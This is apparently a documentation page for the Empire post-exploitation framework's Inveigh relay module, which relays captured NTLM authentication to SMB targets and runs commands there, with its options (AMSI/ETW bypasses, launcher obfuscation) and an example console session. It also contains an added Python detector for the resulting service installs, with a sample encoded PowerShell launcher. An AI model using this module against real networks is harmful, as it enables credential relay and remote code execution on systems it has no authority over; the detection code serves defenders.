Invoke-InveighRelay - Empire Module
This page contains detailed information about how to use the powershell/lateral_movement/inveigh_relay Empire module. For a list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-InveighRelay
Module: powershell/lateral_movement/inveigh_relay
Source code [1]: empire/server/modules/powershell/lateral_movement/inveigh_relay.yaml
Source code [2]: empire/server/modules/powershell/lateral_movement/inveigh_relay.py
MITRE ATT&CK:
T1171
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes
The inveigh_relay module is Inveigh's SMB relay function. This module can be used to relay incoming HTTP/Proxy NTLMv1/NTLMv2 authentication requests to an SMB target. If the authentication is successfully relayed and the account has the correct privilege, a specified command or Empire launcher will be executed on the target PSExec style. This module works best while also running collection/inveigh with HTTP disabled. Note that this module exposes only a subset of Inveigh Relay's parameters. Inveigh Relay can be used through Empire's scriptimport and scriptcmd if additional parameters are needed.
This module runs in the background and is OPSEC unsafe, as it writes to disk and therefore could be detected by AV/EDR running on the target system.
Note that the inveigh_relay module does not need administrative privileges to work properly, which means that a normal user can run this module.
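From the defender's side, the PSExec-style execution described above leaves a service installation on the relay target, and the module's default service name is a 20-character random string. The following added example (not Empire or Inveigh code) runs a heuristic over constructed records modelled on Windows System log Event ID 7045 ("A service was installed in the system"); the field names and sample values are constructed for this example.

```python
import math
import re
from collections import Counter

# Constructed sample records modelled on Event ID 7045. The field names are
# an assumption for this example; a real pipeline would map them from the
# event XML. The second record imitates a PSExec-style install: a random
# 20-character service name whose image path is a command-shell launcher.
SAMPLE_7045 = [
    {"host": "FILESRV01", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "Account": "LocalSystem"},
    {"host": "FILESRV01", "ServiceName": "KJHGFDSAQWERTYUIOPZX",
     "ImagePath": r"%COMSPEC% /C powershell -enc AAAA", "Account": "LocalSystem"},
    {"host": "WKSTN07", "ServiceName": "BackupAgentSvc",
     "ImagePath": r"C:\Program Files\Backup\agent.exe", "Account": "LocalSystem"},
]

# Exactly 20 alphanumeric characters, matching the module's default service name length.
RANDOM_NAME = re.compile(r"^[A-Za-z0-9]{20}$")
# Service binaries that are really a shell/launcher invocation rather than an EXE.
LAUNCHER_HINT = re.compile(r"(powershell|cmd(\.exe)?\s+/c|%COMSPEC%)", re.IGNORECASE)


def shannon_entropy(s):
    """Bits per character; random 20-char names sit near log2(20) = 4.32."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def score_service_install(rec, min_entropy=3.5):
    """Return the list of reasons a 7045 record looks like a relay-driven install."""
    reasons = []
    name = rec["ServiceName"]
    if RANDOM_NAME.match(name) and shannon_entropy(name) >= min_entropy:
        reasons.append("20-char random-looking service name")
    if LAUNCHER_HINT.search(rec["ImagePath"]):
        reasons.append("service binary path is a command-shell launcher")
    return reasons


def find_suspicious(records):
    """Filter records down to (host, service name, reasons) for those that scored."""
    hits = []
    for rec in records:
        reasons = score_service_install(rec)
        if reasons:
            hits.append((rec["host"], rec["ServiceName"], reasons))
    return hits


if __name__ == "__main__":
    for host, name, reasons in find_suspicious(SAMPLE_7045):
        print(f"{host}: service '{name}' flagged: {'; '.join(reasons)}")
```

Both heuristics are deliberately loose; in practice the hit should be correlated with a network (type 3) NTLM logon to the same host from the relaying machine, and the service deletion that follows shortly after.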
Required Module Options
This is a list of options that are required by the inveigh_relay module:
Agent
Agent to run module on.
RunTime
Run time duration in minutes.
Target
IP address or hostname of system to target for relay.
Additional Module Options
This is a list of additional options that are supported by the inveigh_relay module:
Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw.
Command
Command to execute on relay target. Do not wrap in quotes and use PowerShell escape characters and newlines where necessary.
ConsoleOutput
(Low/Medium/Y) Default = Y: Enable/Disable real time console output. Medium and Low can be used to reduce output.
ConsoleStatus
Interval in minutes for displaying all unique captured hashes and credentials. This will display a clean list of captures in Empire.
ConsoleUnique
(Y/N) Default = Y: Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.
HTTP
(Y/N) Default = Y: Enable/Disable HTTP challenge/response capture/relay.
Listener
Listener to use.
Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False.
ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1.
Proxy
(Y/N) Default = N: Enable/Disable Inveigh's proxy server authentication capture/relay.
ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default.
ProxyPort
Default = 8492: TCP port for Inveigh's proxy listener.
Proxy_
Proxy to use for request (default, none, or other).
Default value: default.
SMB1
(Switch) Force SMB1.
Service
Default = 20 character random: Name of the service to create and delete on the target.
UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default.
Usernames
Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
WPADAuth
(Anonymous/NTLM) HTTP listener authentication type for wpad.dat requests.
Inveigh_relay Example Usage
Here's an example of how to use the inveigh_relay module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/lateral_movement/inveigh_relay
Author Kevin Robertson
Background True
Comments https://github.com/Kevin-Robertson/Inveigh
Description Inveigh's SMB relay function. This module can be used to relay
incoming HTTP/Proxy NTLMv1/NTLMv2 authentication requests to an SMB
target. If the authentication is successfully relayed and the account
has the correct privilege, a specified command or Empire launcher will
be executed on the target PSExec style. This module works best while
also running collection/inveigh with HTTP disabled. Note that this
module exposes only a subset of Inveigh Relay's parameters. Inveigh
Relay can be used through Empire's scriptimport and scriptcmd if
additional parameters are needed.
Language powershell
Name powershell/lateral_movement/inveigh_relay
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1171
,Record Options----,--------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|------------------|--------------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|------------------|--------------------|----------|-------------------------------------|
| Bypasses | mattifestation etw | False | Bypasses as a space separated list |
| | | | to be prepended to the launcher. |
|------------------|--------------------|----------|-------------------------------------|
| Command | | False | Command to execute on relay target. |
| | | | Do not wrap in quotes and use |
| | | | PowerShell escape characters and |
| | | | newlines where necessary. |
|------------------|--------------------|----------|-------------------------------------|
| ConsoleOutput | | False | (Low/Medium/Y) Default = Y: |
| | | | Enable/Disable real time console |
| | | | output. Medium and Low can be used |
| | | | to reduce output. |
|------------------|--------------------|----------|-------------------------------------|
| ConsoleStatus | | False | Interval in minutes for displaying |
| | | | all unique captured hashes and |
| | | | credentials. This will display a |
| | | | clean list of captures in Empire. |
|------------------|--------------------|----------|-------------------------------------|
| ConsoleUnique | | False | (Y/N) Default = Y: Enable/Disable |
| | | | displaying challenge/response |
| | | | hashes for only unique IP, |
| | | | domain/hostname, and username |
| | | | combinations. |
|------------------|--------------------|----------|-------------------------------------|
| HTTP | | False | (Y/N) Default = Y: Enable/Disable |
| | | | HTTP challenge/response |
| | | | capture/relay. |
|------------------|--------------------|----------|-------------------------------------|
| Listener | | False | Listener to use. |
|------------------|--------------------|----------|-------------------------------------|
| Obfuscate | False | False | Switch. Obfuscate the launcher |
| | | | powershell code, uses the |
| | | | ObfuscateCommand for obfuscation |
| | | | types. For powershell only. |
|------------------|--------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1 | False | The Invoke-Obfuscation command to |
| | | | use. Only used if Obfuscate switch |
| | | | is True. For powershell only. |
|------------------|--------------------|----------|-------------------------------------|
| Proxy | | False | (Y/N) Default = N: Enable/Disable |
| | | | Inveigh\'s proxy server |
| | | | authentication capture/relay. |
|------------------|--------------------|----------|-------------------------------------|
| ProxyCreds | default | False | Proxy credentials |
| | | | ([domain\]username:password) to use |
| | | | for request (default, none, or |
| | | | other). |
|------------------|--------------------|----------|-------------------------------------|
| ProxyPort | | False | Default = 8492: TCP port for |
| | | | Inveigh\'s proxy listener. |
|------------------|--------------------|----------|-------------------------------------|
| Proxy_ | default | False | Proxy to use for request (default, |
| | | | none, or other). |
|------------------|--------------------|----------|-------------------------------------|
| RunTime | | True | Run time duration in minutes. |
|------------------|--------------------|----------|-------------------------------------|
| SMB1 | | False | (Switch) Force SMB1. |
|------------------|--------------------|----------|-------------------------------------|
| Service | | False | Default = 20 character random: Name |
| | | | of the service to create and delete |
| | | | on the target. |
|------------------|--------------------|----------|-------------------------------------|
| Target | | True | IP address or hostname of system to |
| | | | target for relay. |
|------------------|--------------------|----------|-------------------------------------|
| UserAgent | default | False | User-agent string to use for the |
| | | | staging request (default, none, or |
| | | | other). |
|------------------|--------------------|----------|-------------------------------------|
| Usernames | | False | Comma separated list of usernames |
| | | | to use for relay attacks. Accepts |
| | | | both username and domain\username |
| | | | format. |
|------------------|--------------------|----------|-------------------------------------|
| WPADAuth | | False | (Anonymous/NTLM) HTTP listener |
| | | | authentication type for wpad.dat |
| | | | requests. |
'------------------'--------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/lateral_movement/inveigh_relay) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/lateral_movement/inveigh_relay) > set RunTime value
[*] Set RunTime to value
(Empire: usemodule/powershell/lateral_movement/inveigh_relay) > set Target 192.168.100.1
[*] Set Target to 192.168.100.1
(Empire: usemodule/powershell/lateral_movement/inveigh_relay) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come in.
Author
- Kevin Robertson
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/lateral_movement/inveigh_relay.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/lateral_movement/inveigh_relay.py
- https://github.com/Kevin-Robertson/Inveigh
- http://attack.mitre.org/techniques/T1171
See Also
See also the following modules related to this one:
- powershell/lateral_movement/invoke_psexec
- powershell/lateral_movement/invoke_sqloscmd
- powershell/lateral_movement/invoke_psremoting
- powershell/lateral_movement/invoke_executemsbuild
- powershell/lateral_movement/invoke_dcom
- powershell/lateral_movement/invoke_portfwd
- powershell/lateral_movement/jenkins_script_console
- powershell/lateral_movement/new_gpo_immediate_task
- powershell/lateral_movement/invoke_smbexec
- powershell/lateral_movement/invoke_wmi
- powershell/lateral_movement/invoke_wmi_debugger
- powershell/lateral_movement/invoke_sshcommand
- powershell/collection/inveigh
- python/lateral_movement/multi/ssh_launcher
- python/lateral_movement/multi/ssh_command
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.